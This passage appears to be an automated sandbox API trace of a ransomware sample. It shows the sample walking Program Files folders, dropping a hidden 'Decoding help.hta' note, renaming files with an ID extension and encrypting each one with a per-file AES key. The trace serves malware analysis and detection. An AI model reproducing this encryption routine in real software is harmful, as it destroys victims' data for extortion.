Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0044.420] GlobalMemoryStatus (in: lpBuffer=0x1939fd10 | out: lpBuffer=0x1939fd10) [0044.421] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x111fbdc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3ec [0044.445] CloseHandle (hObject=0x3ec) returned 1 [0044.445] FindNextFileW (in: hFindFile=0x5da7b8, lpFindFileData=0x1939fd30 | out: lpFindFileData=0x1939fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TTS20", cAlternateFileName="")) returned 0 [0044.446] FindClose (in: hFindFile=0x5da7b8 | out: hFindFile=0x5da7b8) returned 1 Thread: id = 395 os_tid = 0xae0 [0043.874] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*", lpFindFileData=0x194dfd30 | out: lpFindFileData=0x194dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274de510, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd6d01960, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d01960, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da838 [0044.512] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.512] FindNextFileW (in: hFindFile=0x5da838, lpFindFileData=0x194dfd30 | out: lpFindFileData=0x194dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274de510, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd6d01960, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d01960, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.512] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.512] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.512] FindNextFileW (in: hFindFile=0x5da838, lpFindFileData=0x194dfd30 | out: lpFindFileData=0x194dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274de510, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd6d73d80, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d73d80, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0044.512] lstrcmpW (lpString1=".", lpString2="10.0") returned -1 [0044.512] lstrcmpW (lpString1="..", lpString2="10.0") returned -1 [0044.512] lstrcmpiW (lpString1="windows", lpString2="10.0") returned 1 [0044.518] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*" [0044.518] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*") returned 65 [0044.518] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\", lpString2="10.0" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0" [0044.518] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\*.*" [0044.518] GlobalMemoryStatus (in: lpBuffer=0x194dfd10 | out: lpBuffer=0x194dfd10) [0044.518] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24490048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x704 [0044.562] CloseHandle (hObject=0x704) returned 1 [0044.562] FindNextFileW (in: hFindFile=0x5da838, lpFindFileData=0x194dfd30 | out: lpFindFileData=0x194dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0a6ab00, ftCreationTime.dwHighDateTime=0x1cacb2a, ftLastAccessTime.dwLowDateTime=0x5e9eb8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf0a6ab00, ftLastWriteTime.dwHighDateTime=0x1cacb2a, nFileSizeHigh=0x0, nFileSizeLow=0x87, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActionsPane3.xsd", cAlternateFileName="ACTION~1.XSD")) returned 1 [0044.562] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*" [0044.562] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*") returned 65 [0044.562] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\Decoding help.hta" [0044.562] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\decoding help.hta")) returned 0xffffffff [0044.562] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6a0 [0044.692] WriteFile (in: hFile=0x6a0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x194dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x194dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0044.693] CloseHandle (hObject=0x6a0) returned 1 [0044.693] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0044.693] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ActionsPane3.xsd") returned 1 [0044.693] lstrlenW (lpString="ActionsPane3.xsd") returned 16 [0044.693] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*" [0044.693] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*") returned 65 [0044.693] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\", lpString2="ActionsPane3.xsd" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd" [0044.693] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd" [0044.693] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd.[ID]g9uZrLhJaygpwRm1[ID]" [0044.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\actionspane3.xsd"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\actionspane3.xsd.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0044.756] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\actionspane3.xsd.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0044.757] CreateFileMappingA (hFile=0x320, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3b0 [0044.757] CryptAcquireContextA (in: phProv=0x194dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x194dfcec*=0x3449138) returned 1 [0044.757] CryptGenKey (in: hProv=0x3449138, Algid=0x6610, dwFlags=0x1, phKey=0x194dfce8 | out: phKey=0x194dfce8*=0x5da8b8) returned 1 [0044.757] CryptExportKey (in: hKey=0x5da8b8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x194dfbe4, pdwDataLen=0x194dfce4 | out: pbData=0x194dfbe4*, pdwDataLen=0x194dfce4*=0x2c) returned 1 [0044.758] MapViewOfFile (hFileMappingObject=0x3b0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80) returned 0x6eb0000 [0044.764] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x194dfbe4*, pdwDataLen=0x194dfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x194dfbe4*, pdwDataLen=0x194dfcf8*=0x100) returned 1 [0044.764] CryptEncrypt (in: hKey=0x5da8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6eb0000*, pdwDataLen=0x194dfce4*=0x80, dwBufLen=0x80 | out: pbData=0x6eb0000*, pdwDataLen=0x194dfce4*=0x80) returned 1 [0044.764] UnmapViewOfFile (lpBaseAddress=0x6eb0000) returned 1 [0044.765] CloseHandle (hObject=0x3b0) returned 1 [0044.766] CryptDestroyKey (hKey=0x5da8b8) returned 1 [0044.766] CryptReleaseContext (hProv=0x3449138, dwFlags=0x0) returned 1 [0044.766] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.766] WriteFile (in: hFile=0x320, lpBuffer=0x194dfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x194dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x194dfbe4*, lpNumberOfBytesWritten=0x194dfcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.766] WriteFile (in: hFile=0x320, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x194dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x194dfcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.767] CloseHandle (hObject=0x320) returned 1 [0044.767] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0044.768] FindNextFileW (in: hFindFile=0x5da838, lpFindFileData=0x194dfd30 | out: lpFindFileData=0x194dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6d01960, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x1e948, dwReserved0=0x0, dwReserved1=0x0, cFileName="vstoee.dll", cAlternateFileName="")) returned 1 [0044.768] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*" [0044.768] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*") returned 65 [0044.768] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\Decoding help.hta" [0044.768] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\decoding help.hta")) returned 0x1 [0044.768] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vstoee.dll") returned -1 [0044.768] lstrlenW (lpString="vstoee.dll") returned 10 [0044.768] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*" [0044.768] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*") returned 65 [0044.768] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\", lpString2="vstoee.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" [0044.768] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" [0044.768] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.768] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0044.805] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x728 [0044.805] CreateFileMappingA (hFile=0x728, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6ac [0044.805] CryptAcquireContextA (in: phProv=0x194dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x194dfcec*=0x3448cf8) returned 1 [0044.806] CryptGenKey (in: hProv=0x3448cf8, Algid=0x6610, dwFlags=0x1, phKey=0x194dfce8 | out: phKey=0x194dfce8*=0x5da8b8) returned 1 [0044.806] CryptExportKey (in: hKey=0x5da8b8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x194dfbe4, pdwDataLen=0x194dfce4 | out: pbData=0x194dfbe4*, pdwDataLen=0x194dfce4*=0x2c) returned 1 [0044.806] MapViewOfFile (hFileMappingObject=0x6ac, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1e940) returned 0x44f0000 [0044.842] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x194dfbe4*, pdwDataLen=0x194dfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x194dfbe4*, pdwDataLen=0x194dfcf8*=0x100) returned 1 [0044.842] CryptEncrypt (in: hKey=0x5da8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44f0000, pdwDataLen=0x194dfce4*=0x1e940, dwBufLen=0x1e940 | out: pbData=0x44f0000*, pdwDataLen=0x194dfce4*=0x1e940) returned 1 [0044.917] UnmapViewOfFile (lpBaseAddress=0x44f0000) returned 1 [0045.605] CloseHandle (hObject=0x6ac) returned 1 [0045.605] CryptDestroyKey (hKey=0x5da8b8) returned 1 [0045.605] CryptReleaseContext (hProv=0x3448cf8, dwFlags=0x0) returned 1 [0045.605] SetFilePointerEx (in: hFile=0x728, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.740] WriteFile (in: hFile=0x728, lpBuffer=0x194dfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x194dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x194dfbe4*, lpNumberOfBytesWritten=0x194dfcf8*=0x100, lpOverlapped=0x0) returned 1 [0051.180] WriteFile (in: hFile=0x728, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x194dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x194dfcf8*=0x500, lpOverlapped=0x0) returned 1 [0051.180] CloseHandle (hObject=0x728) returned 1 [0051.682] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.303] FindNextFileW (in: hFindFile=0x5da838, lpFindFileData=0x194dfd30 | out: lpFindFileData=0x194dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6c693e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x3d50, dwReserved0=0x0, dwReserved1=0x0, cFileName="vstoee100.tlb", cAlternateFileName="VSTOEE~1.TLB")) returned 1 [0055.303] lstrcpyW (in: lpString1=0x10fcf5c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*" [0055.303] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*") returned 65 [0055.303] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\Decoding help.hta" [0055.303] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\decoding help.hta")) returned 0x1 [0055.303] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vstoee100.tlb") returned -1 [0055.303] lstrlenW (lpString="vstoee100.tlb") returned 13 [0055.303] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*" [0055.303] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*") returned 65 [0055.303] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\", lpString2="vstoee100.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" [0055.304] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" [0055.304] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0055.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee100.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.516] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee100.tlb.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0060.516] CreateFileMappingA (hFile=0x534, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x29c [0060.516] CryptAcquireContextA (in: phProv=0x194dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x194dfcec*=0x10e28708) returned 1 [0060.517] CryptGenKey (in: hProv=0x10e28708, Algid=0x6610, dwFlags=0x1, phKey=0x194dfce8 | out: phKey=0x194dfce8*=0x10a4ac28) returned 1 [0060.517] CryptExportKey (in: hKey=0x10a4ac28, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x194dfbe4, pdwDataLen=0x194dfce4 | out: pbData=0x194dfbe4*, pdwDataLen=0x194dfce4*=0x2c) returned 1 [0060.517] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d40) Thread: id = 396 os_tid = 0xaf8 [0043.875] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\*.*", lpFindFileData=0x1961fd30 | out: lpFindFileData=0x1961fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da8b8 [0044.684] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.685] FindNextFileW (in: hFindFile=0x5da8b8, lpFindFileData=0x1961fd30 | out: lpFindFileData=0x1961fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.685] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.685] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.685] FindNextFileW (in: hFindFile=0x5da8b8, lpFindFileData=0x1961fd30 | out: lpFindFileData=0x1961fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA7", cAlternateFileName="")) returned 1 [0044.685] lstrcmpW (lpString1=".", lpString2="VBA7") returned -1 [0044.685] lstrcmpW (lpString1="..", lpString2="VBA7") returned -1 [0044.685] lstrcmpiW (lpString1="windows", lpString2="VBA7") returned 1 [0044.685] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 